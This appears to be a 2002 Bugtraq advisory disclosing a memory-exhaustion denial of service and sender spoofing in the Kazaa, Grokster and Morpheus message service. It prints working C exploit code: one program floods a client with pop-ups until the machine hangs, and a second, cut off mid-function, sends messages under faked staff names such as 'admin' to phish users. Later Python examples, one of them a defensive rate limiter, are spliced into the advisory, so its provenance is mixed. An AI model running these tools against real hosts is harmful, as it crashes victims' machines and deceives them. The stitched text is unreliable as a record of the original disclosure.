Bugtraq mailing list archives

Morpheus, Kazaa and Grokster Remote DoS. Also Identity faking vulnerability.
From: mrjade 2k2 <mrjade () softhome net>
Date: Fri, 22 Feb 2002 03:38:53 +0000


Kazaa, Grokster and Morpheus remote denial of service. FastTrack's P2P
technology is vulnerable. Sender identity can also be faked in the message service.


Summary
---------------------
    There is a remote denial of service in FastTrack's peer-to-peer technology,
    used by Kazaa, Grokster and Morpheus, that can allow an attacker to
    crash Kazaa's service and also hang the machine.

    In the same service, the sender's identity can be faked by a malicious
    attacker to draw the remote user into operations of the attacker's choosing.


Version Affected
---------------------
    For denial of service:
    Kazaa, Grokster and Morpheus clients for Windows, version 1.3.3 (not
    tested, but any version with the client-to-client message feature is vulnerable).
    All software from FastTrack that uses its peer-to-peer technology with message
    service support (prior to Kazaa 1.5) is vulnerable at this moment.

    For identity faking:
    Kazaa, Grokster and Morpheus clients for Windows, all versions to this date,
    including the updated Kazaa 1.5.


Denial of service impact
------------------------
    By sending a series of messages, the remote system can be exhausted
    through the resources each one consumes.


Explanation
---------------------
    I'm going to refer to Kazaa as the main target, because it is the first that
    adopted the P2P technology from FastTrack.

    Kazaa's client opens a pop-up window every time a message is received and
    the sender's username isn't on the ignore list. However, available memory isn't
    checked at all, so the system will be exhausted when no more RAM can be reserved
    for a new pop-up window. A system that is out of memory will hang or become
    unstable, and Kazaa's process will crash, losing all open download data up to
    that moment. Usually a reboot will be needed to restore the system.

    Kazaa's client uses the HTTP protocol for sending requests between users.
    All data except download data are sent as tags in the HTTP header, using a very
    simple GET request.

    For the message request, this is an example of the HTTP header
    (connected to port 1214 on the remote host; the data is Snort output):

    02/08-19:10:27.113857 0:E0:4C:E1:22:CD -> 0:4F:49:6:F5:1E type:0x800 len:0x197
    192.168.0.3:3337 -> 66.56.77.172:1486 TCP TTL:128 TOS:0x0 ID:30781  DF
    ***PA* Seq: 0x86CC6D   Ack: 0x8BB6E89   Win: 0x2238
    47 45 54 20 2F 2E 6D 65 73 73 61 67 65 20 48 54  GET /.message HT
    54 50 2F 31 2E 31 0D 0A 48 6F 73 74 3A 20 36 36  TP/1.1..Host: 66
    2E 35 36 2E 37 37 2E 31 37 32 3A 31 34 38 36 0D  .56.77.172:1486.
    0A 55 73 65 72 41 67 65 6E 74 3A 20 4B 61 7A 61  .UserAgent: Kaza
    61 43 6C 69 65 6E 74 20 41 75 67 20 32 39 20 32  aClient Aug 29 2
    30 30 31 20 31 39 3A 34 32 3A 34 36 0D 0A 58 2D  001 19:42:46..X-
    4B 61 7A 61 61 2D 55 73 65 72 6E 61 6D 65 3A 20  Kazaa-Username: 
    ?? ?? ?? ?? ?? ?? 64 0D 0A 58 2D 4B 61 7A 61 61  ???????..X-Kazaa
    2D 4E 65 74 77 6F 72 6B 3A 20 3F 3F 3F 0D 0A 58  -Network: ???..X
    2D 4B 61 7A 61 61 2D 49 50 3A 20 31 39 32 2E 31  -Kazaa-IP: 192.1
    36 38 2E 30 2E 33 3A 31 32 31 34 0D 0A 58 2D 4B  68.0.3:1214..X-K
    61 7A 61 61 2D 53 75 70 65 72 6E 6F 64 65 49 50  azaa-SupernodeIP
    3A 20 32 30 ?? 2E 32 ?? 38 2E ?? ?? ?? ?? ?? ??  : 20?.21?.2?.17?
    3A 31 32 31 34 0D 0A 43 6F 6E 6E 65 63 74 69 6F  :1214..Connectio
    6E 3A 20 63 6C 6F 73 65 0D 0A 58 2D 4B 61 7A 61  n: close..X-Kaza
    61 2D 49 4D 54 6F 3A 20 ?? ?? ?? ?? ?? ?? ?? ??  a-IMTo: ????????
    ?? ?? 40 4B 61 5A 61 41 0D 0A 58 2D 4B 61 7A 61  ??@KaZaA..X-Kaza
    61 2D 49 4D 54 79 70 65 3A 20 75 73 65 72 5F 74  a-IMType: user_t
    65 78 74 0D 0A 58 2D 4B 61 7A 61 61 2D 49 4D 44  ext..X-Kazaa-IMD
    61 74 61 3A 20 ?? ?? ?? ?? ?? ?? ?? ?? 61 57 35  ata: ???????????
    70 63 32 68 70 ?? ?? ?? ?? ?? ?? ?? ?? 49 47 52  ????????????????
    76 64 32 35 73 ?? ?? ?? ?? ?? ?? ?? ?? 0D 0A 0D  ???????????==...
    0A                                               .

    In a readable format and completed:

    GET /.message HTTP/1.1                      | message request.
    Host: 192.168.0.3:1214                      | remote host ip.
    UserAgent: KazaaClient Aug 29 2001 19:42:46 | 
    X-Kazaa-Username: attacker                  | Username@Network is the sender's
    X-Kazaa-Network: mydomain                   | Kazaa username. Can be faked.
    X-Kazaa-IP: 192.168.0.1:1214                | Our ip, for the client's answer.
    X-Kazaa-SupernodeIP: 20?.21?.2?.17?:1214    | 
    Connection: close                           | 
    X-Kazaa-IMTo: victim@KaZaA                  | To: it must be the victim's username
    X-Kazaa-IMType: user_text                   | or the popup won't open.
    X-Kazaa-IMData: ????????????????            | Radix64-encoded message.
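To work with captures like the one above, here is an added example (not part of the advisory or of the author's tools) that rebuilds the raw request bytes from Snort's hex-dump layout and splits the HTTP-style header on the CRLF line endings the dump shows. The sample input is the six unredacted dump lines copied from the capture above; mapping a redacted `??` byte to a literal `?` placeholder, so that offsets stay correct, is this example's own convention.

```python
"""Rebuild a request payload from a Snort-style hex dump (added example).

Each dump line is up to 16 hex byte pairs followed by an ASCII rendering; bytes
that were masked with '??' in the advisory are kept as a literal '?' placeholder
so offsets stay correct.
"""
import re

HEX_PAIR = re.compile(r"^(?:[0-9A-Fa-f]{2}|\?\?)$")
BYTES_PER_LINE = 16

# Constructed sample: the six fully visible dump lines from the capture above.
SAMPLE_DUMP = """\
47 45 54 20 2F 2E 6D 65 73 73 61 67 65 20 48 54  GET /.message HT
54 50 2F 31 2E 31 0D 0A 48 6F 73 74 3A 20 36 36  TP/1.1..Host: 66
2E 35 36 2E 37 37 2E 31 37 32 3A 31 34 38 36 0D  .56.77.172:1486.
0A 55 73 65 72 41 67 65 6E 74 3A 20 4B 61 7A 61  .UserAgent: Kaza
61 43 6C 69 65 6E 74 20 41 75 67 20 32 39 20 32  aClient Aug 29 2
30 30 31 20 31 39 3A 34 32 3A 34 36 0D 0A 58 2D  001 19:42:46..X-
"""


def snort_hex_to_bytes(dump: str) -> bytes:
    """Return the payload bytes encoded in a Snort hex dump.

    Only the leading run of byte tokens on each line is used (at most 16), so the
    ASCII column on the right, which may itself contain hex-looking words such as
    '29', is never mistaken for data. Packet header lines contribute nothing
    because their first token is not a byte pair.
    """
    out = bytearray()
    for line in dump.splitlines():
        taken = 0
        for tok in line.split():
            if taken == BYTES_PER_LINE or not HEX_PAIR.match(tok):
                break
            out.append(0x3F if tok == "??" else int(tok, 16))  # '?' marks a redacted byte
            taken += 1
    return bytes(out)


def header_lines(payload: bytes) -> list:
    """Split the HTTP-style header into its lines (CRLF separated, as the dump shows)."""
    head = payload.split(b"\r\n\r\n", 1)[0]
    return [l.decode("ascii", "replace") for l in head.split(b"\r\n")]


if __name__ == "__main__":
    raw = snort_hex_to_bytes(SAMPLE_DUMP)
    print(len(raw), "bytes")
    for line in header_lines(raw):
        print(repr(line))
```

Running it on the sample prints the 96 recovered bytes as four header lines, the last one being the truncated `X-` where the sample stops; the `..` pairs in Snort's ASCII column are the `0D 0A` CRLF terminators, which is why the header must be split on `\r\n` and not on `\n` alone.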

    The fields required in a complete HTTP/1.1 request for Kazaa to accept
    the message are:

    GET /.message HTTP/1.1         | message request.
    X-Kazaa-Username: ???????      | who the message was sent from.
    X-Kazaa-Network: ???????       | 
    X-Kazaa-IMTo: victim           | victim's username (only the username).
    X-Kazaa-IMType: user_text      | type of data.
    X-Kazaa-IMData: ????????       | encoded message.

    The remote user's username must be correct for the message window to pop up,
    and Kazaa's client reveals its username on any TCP connection to port 1214
    (a security matter in itself?).

    It's simple to send a large number of HTTP requests to Kazaa clients, each with a
    different attacker username and domain, to get around the ignore option. Remote
    clients can be attacked even if they are not connected to Kazaa's network or
    logged in.

    No exploit is needed to do the trick. An ordinary Kazaa client can do it if the
    remote user isn't able to stop the incoming messages.


Other
---------------------
    In fact, Kazaa's message system can be used for malicious purposes, as the
    sender's identity can easily be faked. Using kazaa.com as the attacker's network
    and usernames such as admin, security and so on, users can be misled into
    disclosing sensitive information in private messages.
    The response to the message can be captured just by listening on port 1214 and
    decoding X-Kazaa-IMData with the radix64 algorithm.


Solution
---------------------
    The vendors were notified of the problem before the general public, and helped
    with the research for this advisory. Kazaa version 1.5 can be downloaded, and
    FastTrack assures that its message service has been repaired.

    As the problem only affects the message system, ignoring all received messages
    is the fastest and only real solution while waiting for the vendor's fix. So, in
    the application menu, go to Tools, Options, Messages and tick the
    'ignore all messages' check box.

    As the attacker can modify the sender information (username@domain), trying to
    ignore every attacker username is impossible, since it can be randomly generated.

    For identity faking, no action has been taken. Kazaa's private messages
    should sometimes be ignored, and other means of contact considered for
    administrative purposes from Kazaa, Grokster and Morpheus staff. To increase
    security, Kazaa's username must not be given out on any TCP connection but
    only to Kazaa's supernodes, and a better encryption algorithm is recommended.
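The receiving side is where the two problems above have to be handled: the client opens a pop-up per message with no memory check, and the only identity it has for the sender is a header the sender wrote. The following added example (not the advisory's code and not how any FastTrack client was implemented) parses the `/.message` request in the layout documented above, enforces the required headers, decodes the radix64 body, and applies the mitigations the Solution section argues for: a pop-up budget keyed on the TCP peer address rather than on the attacker-chosen `X-Kazaa-Username`, a cap on pending pop-ups so memory stays bounded, and a flag on sender names that imitate vendor staff. The limits, the staff-name and vendor-network lists, and the `build_request` helper that fabricates test input are all constructed for this example.

```python
"""Receiver-side handling of FastTrack '/.message' requests (added example).

Parses the request layout the advisory documents, enforces its required
headers, decodes the radix64 (base64) body, and applies the two mitigations
the advisory argues for: budget pop-ups by the TCP peer address rather than by
the attacker-chosen X-Kazaa-Username, and cap pending pop-ups so memory stays
bounded. Sender names that imitate vendor staff are flagged for the user.
"""
import base64
import binascii
from collections import defaultdict, deque

REQUIRED_HEADERS = ("X-Kazaa-Username", "X-Kazaa-Network",
                    "X-Kazaa-IMTo", "X-Kazaa-IMType", "X-Kazaa-IMData")
# Constructed lists: names/networks a spoofer would pick to look like vendor staff.
STAFF_NAMES = {"admin", "administrator", "security", "support"}
VENDOR_NETWORKS = {"kazaa", "kazaa.com"}


def parse_message_request(raw: bytes):
    """Return a header dict for a 'GET /.message' request, or None if it is unusable.

    Every value is attacker-controlled; this only establishes well-formedness.
    """
    try:
        text = raw.decode("ascii").replace("\r\n", "\n")
    except UnicodeDecodeError:
        return None
    lines = text.split("\n\n", 1)[0].split("\n")
    if not lines[0].startswith("GET /.message HTTP/1."):
        return None
    headers = {}
    for line in lines[1:]:
        if not line:
            continue
        name, sep, value = line.partition(":")
        if not sep:
            return None
        headers[name.strip()] = value.strip()
    if any(h not in headers for h in REQUIRED_HEADERS) or headers["X-Kazaa-IMType"] != "user_text":
        return None
    try:
        headers["message"] = base64.b64decode(headers["X-Kazaa-IMData"], validate=True).decode("utf-8", "replace")
    except (binascii.Error, ValueError):
        return None
    return headers


def looks_like_staff_spoof(username: str, network: str) -> bool:
    """Flag a sender identity that imitates vendor staff; it proves nothing either way."""
    return username.lower() in STAFF_NAMES or network.lower() in VENDOR_NETWORKS


class PopupGuard:
    """Bounded, per-peer budget for inbound message pop-ups."""

    def __init__(self, per_peer_limit=5, window_seconds=60.0, max_pending=50):
        self.per_peer_limit = per_peer_limit
        self.window = window_seconds
        self.max_pending = max_pending
        self._arrivals = defaultdict(deque)  # peer ip -> recent arrival times
        self.pending = []                    # pop-ups waiting for the user
        self.dropped = 0

    def handle(self, peer_ip: str, raw: bytes, now: float, local_username: str) -> str:
        """Return 'popup', 'drop' or 'reject' for one inbound request."""
        hdr = parse_message_request(raw)
        if hdr is None or hdr["X-Kazaa-IMTo"].split("@")[0] != local_username:
            return "reject"                  # malformed or not addressed to this client
        recent = self._arrivals[peer_ip]
        while recent and now - recent[0] > self.window:
            recent.popleft()
        if len(recent) >= self.per_peer_limit or len(self.pending) >= self.max_pending:
            self.dropped += 1
            return "drop"                    # budget exhausted: no new window is opened
        recent.append(now)
        self.pending.append({
            "peer": peer_ip,
            "from": hdr["X-Kazaa-Username"] + "@" + hdr["X-Kazaa-Network"],
            "staff_spoof": looks_like_staff_spoof(hdr["X-Kazaa-Username"], hdr["X-Kazaa-Network"]),
            "text": hdr["message"],
        })
        return "popup"


def build_request(sender: str, network: str, to: str, text: str) -> bytes:
    """Construct a request in the layout shown in the advisory (test input only)."""
    data = base64.b64encode(text.encode()).decode()
    return (f"GET /.message HTTP/1.1\r\nX-Kazaa-Username: {sender}\r\n"
            f"X-Kazaa-Network: {network}\r\nX-Kazaa-IMTo: {to}\r\n"
            f"X-Kazaa-IMType: user_text\r\nX-Kazaa-IMData: {data}\r\n\r\n").encode()


def replay_burst(n: int = 1000, per_peer_limit: int = 5):
    """Feed n requests from one peer, each with a fresh sender name, through the guard.

    A username-based ignore list would never match these; the peer-keyed budget does.
    """
    guard = PopupGuard(per_peer_limit=per_peer_limit)
    outcomes = defaultdict(int)
    for i in range(n):
        raw = build_request(f"user{i}", "domain.com", "victim", "aaa")
        outcomes[guard.handle("192.168.0.1", raw, float(i) / 100, "victim")] += 1
    return dict(outcomes), len(guard.pending)


if __name__ == "__main__":
    print(replay_burst())
```

`replay_burst` models the advisory's scenario of a thousand requests from one host, each with a different sender name: only the first five open a window and the remaining 995 are dropped with no allocation, which is the property the original client lacked. The budget is keyed on the peer address because that is the one value the sender cannot fill in freely; it is still not a strong identity (peers can change address), so the global `max_pending` cap is what actually bounds memory.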


Acknowledgements
---------------------
    Both bugs were discovered by mrjade, have been tested, and demonstration code
    is available in this paper.


Contact Information
---------------------
    mrjade () softhome net

    This advisory is also available at:

    http://www.hackindex.org/kazaa.htm
  
    Sources available at:

    http://www.hackindex.org/download/kazaa-xploit.c
    http://www.hackindex.org/download/kazaa-msg.c


Disclaimer
---------------------
    This advisory does not claim to be complete, nor is it intended for malicious
    purposes. The supplied exploit code is to be used as a demonstration of the bug
    or for educational purposes only.

    This advisory was written for open distribution in unmodified form.
    Articles that are based on information from this advisory should include
    a link or a credits note.


Credits
----------------------
    Thanks to the FastTrack staff for their support and help in researching this,
    to the Spanish people on the net, and to the people near me, especially the
    one who encourages me.


Demonstration code
---------------------

   These two programs demonstrate both of the security issues in the software.
   kazaa-xploit.c will send a number of messages to a host/IP running the Kazaa,
                  Grokster or Morpheus software, trying to crash it.

   kazaa-msg.c    will send a message to a host/IP running the Kazaa, Grokster or
                  Morpheus software, faking the identity of the sender.




/* kazaa-xploit.c code Begin Of File ------------------------------------------
 *
 * Filename : kazaa-xploit.c
 * Version  : 0.1
 * Coder(s) : mrjade [WkT!] <mrjade () softhome net>
 * Date     : 9/2/2K2 
 * Abstract : Send X messages to any kazaa, grokster and morpheus client
 *            version 1.3.3 for windows, exhausting the system. 
 *
 * Compile: #gcc -o kazaa-xploit kazaa-xploit.c
 * Usage:   #./kazaa-xploit host/ip nmessages
 * Example: #./kazaa-xploit 192.168.0.5 1000
 * 
 * This will send 1000 messages to the given kazaa client.
 * Proof of concept for the same advisory. Source code
 * extracted from the kazaa-msg.c program written by mrjade, for
 * sending readable messages to any kazaa user.
 * 
 * License conditions:
 *
 * Copyright (c) 2002 mrjade - <mrjade () softhome net>
 * 
 * This program is free software; you can redistribute it and/or modify
 * it under the terms of the GNU General Public License as published by
 * the Free Software Foundation; either version 2 of the License, or
 * (at your option) any later version.
 * 
 * This program is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 * GNU General Public License for more details.
 *
 * You should have received a copy of the GNU General Public License
 * along with this program; if not, write to the Free Software
 * Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA  02111-1307  USA
 *
 * NOTES: 
 * Improvements to this code could generate different id@domain names for
 * each connection.
 *
 * For 300mb of RAM, 1000 messages will be a good example.
 */

/*  ---== Include section ==---                         */

#include <sys/types.h>
#include <sys/socket.h>  /* socket(), connect(), send(), recv() */
#include <netinet/in.h>  /* struct sockaddr_in, htons() */
#include <netdb.h>       /* gethostbyname() */
#include <arpa/inet.h>   /* inet_addr() */
#include <unistd.h>      /* close() */
 
#include <stdio.h>   /* printf(), fflush() */
#include <stdlib.h>  /* malloc(), exit(), strtol() */
#include <string.h>  /* strstr(), strchr(), memcpy() */
#include <strings.h> /* bzero() */
 
/*  ---== Defines section ==---                         */

/* kazaa-head: id, domain, to */
#define kazaa_head "\
GET /.message HTTP/1.1\n\
X-Kazaa-Username: %s\n\
X-Kazaa-Network: %s\n\
X-Kazaa-IMTo: %s\n\
X-Kazaa-IMType: user_text\n\
X-Kazaa-IMData: aaa\n\
\n\n\n"

#define http_basic "GET / HTTP/1.0\nHost: localhost\n\n"
#define id_ "user"              /* Default id for sending msg */
#define minetwork "domain.com"  /* Default id for sending msg */
#define PORT 1214               /* Default port for sending data */

/*  ---== Procedure section ==---                        */

/* Usage Banner..*/
void usage(char *pname) {
  printf (" :: Usage : %s ip/host n_messages\n", pname);
  printf (" :: 1000 for 300mb of RAM aprox.\n");
  fflush (stdout);
  exit(-1);
}

/* Resolv hostname */

unsigned long resol(char *host) {
struct in_addr addr;
struct hostent *host_ent;

  if((addr.s_addr = inet_addr(host)) == -1) {
        printf(" :: Resolving host: %s\n", host);       
        if(!(host_ent = gethostbyname(host))) return(0);
        memcpy((char *)&addr.s_addr, host_ent->h_addr, host_ent->h_length);
  } return(addr.s_addr);
}


/* Return the value that follows 'token' in buffer, terminated at the end of
 * that header line (CR and LF both stripped). NULL if the token isn't present. */
char *get_token (char *buffer, char *token){
char *stri, *strf;

  if (!(stri = strstr (buffer, token)))
        return (NULL);
  stri = stri + strlen(token);
  if ((strf = strchr (stri, '\n'))) {
        /* header lines end in CRLF, so drop the CR too when it's there */
        if (strf > stri && strf[-1] == '\r')
                strf[-1] = 0;
        else
                *strf = 0;
  }
  return (stri);
}

/*  ---== MAIN Procedure ==---                           */

int main(int argc, char *argv[]) {
int sock, c_, cont;
char *host;
struct sockaddr_in TheHoSt;
char *btmp;
char *user_name, *id;           /* user_name = id = remote user name */
char *user_net, *network;       /* user_net = network = remote user network */
char buffer[512];               /* Rec. buffer*/
int a=0;

        printf("\n :: xploit code for kazaa, morpheus and grokster users..");
        printf("\n :: (C)2002 mrjade [WkT!]          <mrjade () softhome net>\n");

        if( argc < 3) {
                usage( argv[0] );
        }
        
        /* Host resolv and connect */
        host = argv[1];
        TheHoSt.sin_family = AF_INET;
        TheHoSt.sin_addr.s_addr = resol(host);
        if(!TheHoSt.sin_addr.s_addr) {
                printf(" :: ERROR: host not found.\n\n");
                exit(-1);
        }
        
        /* We must get remote user name, need it to send any request */
        TheHoSt.sin_port = htons(PORT);
        sock = socket(AF_INET, SOCK_STREAM, 0);
        if(sock < 0) {
                printf(" :: ERROR: Can't open socket\n\n");
                exit(-1);
        }
        bzero(buffer,sizeof(buffer));   
        if(!connect(sock,(struct sockaddr *)&TheHoSt, sizeof(TheHoSt))) {

                printf(" ::\n :: Getting username@network: "); fflush(stdout);
        
                /* Search for username@userdomain on host; leave room for the NUL */
                send(sock,http_basic,strlen(http_basic),0);
                recv(sock,buffer,sizeof(buffer)-1,0);
                close(sock);

                if ((user_net = get_token(buffer, "Network: ")) && \
                    (user_name = get_token(buffer, "Username: "))){
                        printf ("%s@%s\n", user_name, user_net); 
                        fflush (stdout);
                } else {
                        printf ("ERR\n :: No username or network detected\n\n");
                        fflush (stdout);
                        exit (-1);
                }

                /* Storing strings */
                network  = malloc (strlen(user_net)+1);
                bzero (network, strlen(user_net)+1);
                memcpy (network, user_net, strlen(user_net));

                id  = malloc (strlen(user_name)+1);
                bzero (id, strlen(user_name)+1);
                memcpy (id, user_name, strlen(user_name));
        } else {
                printf(" :: ERR Can't connect.\n\n");
                fflush(stdout);
                exit (-1);
        }

        /* number of msg to send*/
        cont = strtol (argv[argc-1],0,10);
        if (cont < 1){
                cont= 1000;
        } 
        printf(" :: Sending %d messages:\n", cont);
        fflush(stdout);
                
        
        /* create HTTP request */
        c_ = strlen(kazaa_head)+strlen(id_)+strlen(id)+strlen(minetwork)+3;
        btmp = malloc( c_);
        bzero(btmp, c_);
        sprintf (btmp, kazaa_head, id_, minetwork,  id);

        
        
        /* Loop: one connection per message */
        for (a=0; a < cont; a++){

                /* Now send the message request */
                sock = socket(AF_INET, SOCK_STREAM, 0);
                if(sock < 0) {
                        printf(" :: ERROR: Can't open socket\n\n");
                        exit(-1);
                }

                printf(".");fflush(stdout);
                bzero(buffer,sizeof(buffer));
                if(!connect(sock,(struct sockaddr *)&TheHoSt, sizeof(TheHoSt))) {
                        send(sock,btmp,strlen(btmp),0);
                        recv(sock,buffer,sizeof(buffer)-1,0); /* keep the NUL */
                        if (strstr(buffer, "200")){ /* HTTP OK */
                                printf(".");fflush(stdout);
                        } else {
                                printf("\n :: Can't deliver message. \n\n");fflush(stdout);
                                close(sock);
                                exit(-1);
                        }
                        bzero(buffer,sizeof(buffer)); /* Clear Buffer */
                } else {
                        close(sock);
                        printf("\n :: Can't connect. Service down \n\n");
                        exit(-1);
                }
                close (sock);
        } /* for */
        return (0);
}
/* End Of File -----------------------------------------------------------------------*/



/* kazaa-msg.c code Begin Of File ------------------------------------------------------
 *
 * Filename : kazaa-msg.c
 * Version  : 0.1
 * Coder(s) : mrjade [WkT!] <mrjade () softhome net>
 * Date     : 9/2/2K2 
 * Abstract : Send a message to any kazaa, grokster and morpheus user,
 *            knowing their ip/hostname. Programmed for hackindex team.
 *            http://www.hackindex.com
 *
 * Compile: #gcc -o kazaa-msg kazaa-msg.c
 * 
 * Usage: #./kazaa-msg host/ip message
 * 
 * Example: #./kazaa-msg 192.168.0.5 Hey.. i can send you a message..
 * 
 * This will send a message to the given kazaa user (host). Actually this is 
 * just a proof of concept. Required fields for sending a message are:
 *
 * X-Kazaa-Username
 * X-Kazaa-Network 
 *
 *  These form the "FROM" field: name@network
 *  modify the id_ and minetwork defines to change the "FROM" field.
 * 
 * X-Kazaa-IMTo                  "TO" field. Remote kazaa's login
 *                                (kazaa, grokster, morpheus) 
 *                                It's retrieved from a first connection to 
 *                                the host.
 * X-Kazaa-IMType user_text       Type of data (fixed)
 * X-Kazaa-IMData                 Message radix64 encoded.
 * 
 * For grokster (tested) and morpheus (not tested) the name of the fields
 * in the HTTP header are the same.
 * 
 * If you want to receive any answer from the remote user, you must open 
 * a tcp socket listening on port 1214. HTTP header will be the same, and
 * message must be decoded using Radix64 algorithm.
 * 
 * License conditions:
 *
 * Copyright (c) 2002 mrjade - <mrjade () softhome net>
 * 
 * This program is free software; you can redistribute it and/or modify
 * it under the terms of the GNU General Public License as published by
 * the Free Software Foundation; either version 2 of the License, or
 * (at your option) any later version.
 * 
 * This program is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 * GNU General Public License for more details.
 *
 * You should have received a copy of the GNU General Public License
 * along with this program; if not, write to the Free Software
 * Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA  02111-1307  USA
 *
 *
 * Other Copyright: 
 * 
 * radix64 encode table and enc64() by Carl M. Ellison *
 *
 * NOTES: 
 * Not tested at all.. it may be bugged.
 */

/*  ---== Include section ==---                         */

#include <sys/types.h>
#include <sys/socket.h>  /* socket(), connect(), send(), recv() */
#include <netinet/in.h>  /* struct sockaddr_in, htons() */
#include <netdb.h>       /* gethostbyname() */
#include <arpa/inet.h>   /* inet_addr() */
#include <unistd.h>      /* close() */
 
#include <stdio.h>   /* printf(), fflush() */
#include <stdlib.h>  /* malloc(), exit() */
#include <string.h>  /* strstr(), strchr(), strcat(), memcpy() */
#include <strings.h> /* bzero() */
 
/*  ---== Defines section ==---                         */

/* kazaa-head: id, domain, to, msg-radix64 */
#define kazaa_head "\
GET /.message HTTP/1.1\n\
Host: localhost\n\
UserAgent: KazaaClient Aug 29 2001 19:42:46\n\
X-Kazaa-Username: %s\n\
X-Kazaa-Network: %s\n\
Connection: close\n\
X-Kazaa-IMTo: %s\n\
X-Kazaa-IMType: user_text\n\
X-Kazaa-IMData: %s\n\
\n\n\n"

#define http_basic "GET / HTTP/1.0\nHost: localhost\n\n"
#define id_ "admin"             /* Default id for sending msg */
#define minetwork "hackindex"   /* Default id for sending msg */
#define PORT 1214               /* Default port for sending data */

/*  ---== Global variables ==---                         */


char enctab[64] = {             /* radix64 encoding table */
  'A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P',
  'Q','R','S','T','U','V','W','X','Y','Z','a','b','c','d','e','f',
  'g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v',
  'w','x','y','z','0','1','2','3','4','5','6','7','8','9','+','/' 
}; 

/*  ---== Procedure section ==---                        */

/* Usage Banner..*/
void usage(char *pname) {
  printf (" :: Usage : %s ip/host mensaje\n", pname);
  fflush (stdout);
  exit(-1);
}

/* Resolv hostname */
unsigned long resol(char *host) {
struct in_addr addr;
struct hostent *host_ent;

  if((addr.s_addr = inet_addr(host)) == -1) {
        printf(" :: Resolving host: %s\n", host);       
        if(!(host_ent = gethostbyname(host))) return(0);
        memcpy((char *)&addr.s_addr, host_ent->h_addr, host_ent->h_length);
  } return(addr.s_addr);
}


/* Return the value that follows 'token' in buffer, terminated at the end of
 * that header line (CR and LF both stripped). NULL if the token isn't present. */
char *get_token (char *buffer, char *token){
char *stri, *strf;

  if (!(stri = strstr (buffer, token)))
        return (NULL);
  stri = stri + strlen(token);
  if ((strf = strchr (stri, '\n'))) {
        /* header lines end in CRLF, so drop the CR too when it's there */
        if (strf > stri && strf[-1] == '\r')
                strf[-1] = 0;
        else
                *strf = 0;
  }
  return (stri);
}


/* Radix64 (base64) encoder: encode inb_lth bytes from inbuff into outbuff,
 * which holds out_lth bytes. *polth receives the number of bytes written.
 * line_lth is the maximum output line length (-1 means no wrapping) and
 * n_space the number of spaces at the start of each wrapped line. */
void enc64( char *outbuff, long out_lth, long *polth,
            unsigned char *inbuff, long inb_lth, long line_lth, long n_space )
{
  long nl ;                     /* # chars left in this line */
  unsigned char *b ;            /* walking input pointer (unsigned so bytes >= 0x80 don't sign-extend) */
  char *c ;                     /* walking output pointer */
  unsigned char b1, b2 ;        /* 2nd and 3rd input bytes, zero past the end of input */

  nl = line_lth ;
  b = inbuff ;
  c = outbuff ;

  while (  (inb_lth > 0)
         &&(out_lth > 5) ) {
    /* never read past the end of the input in the final, short group */
    b1 = (inb_lth > 1) ? b[1] : 0 ;
    b2 = (inb_lth > 2) ? b[2] : 0 ;
    /* encoding */
    c[0]=enctab[(b[0]>>2)&0x3f] ;
    c[1]=enctab[((b[0]&0x3)<<4)|((b1>>4)&0xf)] ;
    c[2]=enctab[((b1&0xf)<<2)|((b2>>6)&0x3)] ;
    c[3]=enctab[b2&0x3f] ;
    out_lth -= 4 ;              /* count the code bytes */
    switch (inb_lth) {          /* take care of the final bytes */
    case 1: c[2]='=' ;          /* only 1, so == (falls through) */
    case 2: c[3]='=' ;          /* 2, so = */
      inb_lth = 0 ;             /* either way, we're done */
      c += 4 ;                  /* but no spaces */
      *(c++) = '\n' ;           /* and there's an end of line */
      break ;

    default:
      inb_lth -= 3;
      b += 3 ;
      c += 4 ;
      nl -= 4 ;
      if (line_lth > 0 && nl <= 0) { /* wrap only when a line length was given */
        long i ;
        *(c++) = '\n' ;
        nl = line_lth ;
        for (i=0;i<n_space;i++)
          *(c++) = ' ' ;
        out_lth -= 1 + n_space ;
      }
      break ;
    } /* switch */
  } /* while */
  *polth = c - outbuff ;
} /* enc64 */

/*  ---== MAIN Procedure ==---                           */

int main(int argc, char *argv[]) {
int sock, c_, cont;
char *host;
struct sockaddr_in TheHoSt;
char *btmp;
char *user_name, *id;           /* user_name = id = remote user name */
char *user_net, *network;       /* user_net = network = remote user network */
char *msg, *msgr64;             /* Radix 64 stuf */
long olth;                      /* Radix 64 stuf */
char buffer[512];               /* Rec. buffer*/

        printf("\n :: Message sending 4 kazaa, morpheus and grokster users..");
        printf("\n :: (C)2002 mrjade [WkT!]            <mrjade () softhome net>\n");

        if( argc < 3) {
                usage( argv[0] );
        }
        
        /* Host resolv and connect */
        host = argv[1];
        TheHoSt.sin_family = AF_INET;
        TheHoSt.sin_addr.s_addr = resol(host);
        if(!TheHoSt.sin_addr.s_addr) {
                printf(" :: ERROR: host not found.\n\n");
                exit(-1);
        }
        
        /* We must get remote user name, need it to send any request */
        TheHoSt.sin_port = htons(PORT);
        sock = socket(AF_INET, SOCK_STREAM, 0);
        if(sock < 0) {
                printf(" :: ERROR: Can't open socket\n\n");
                exit(-1);
        }
        bzero(buffer,sizeof(buffer));   
        if(!connect(sock,(struct sockaddr *)&TheHoSt, sizeof(TheHoSt))) {

                printf(" ::\n :: Getting username@network: "); fflush(stdout);
        
                /* Search for username@userdomain on host; leave room for the NUL */
                send(sock,http_basic,strlen(http_basic),0);
                recv(sock,buffer,sizeof(buffer)-1,0);
                close(sock);

                if ((user_net = get_token(buffer, "Network: ")) && (user_name = get_token(buffer, "Username: "))){
                        printf ("%s@%s\n", user_name, user_net); fflush (stdout);
                } else {
                        printf ("ERR\n :: No username or network detected\n\n"); fflush (stdout);
                        exit (-1);
                }

                /* Storing strings */
                network  = malloc (strlen(user_net)+1);
                bzero (network, strlen(user_net)+1);
                memcpy (network, user_net, strlen(user_net));

                id  = malloc (strlen(user_name)+1);
                bzero (id, strlen(user_name)+1);
                memcpy (id, user_name, strlen(user_name));
        } else {
                printf(" :: ERROR: Can't connect\n\n"); fflush(stdout);
                exit (-1);
        }

        
        /* Now send the message request */              
        sock = socket(AF_INET, SOCK_STREAM, 0);
        if(sock < 0) {
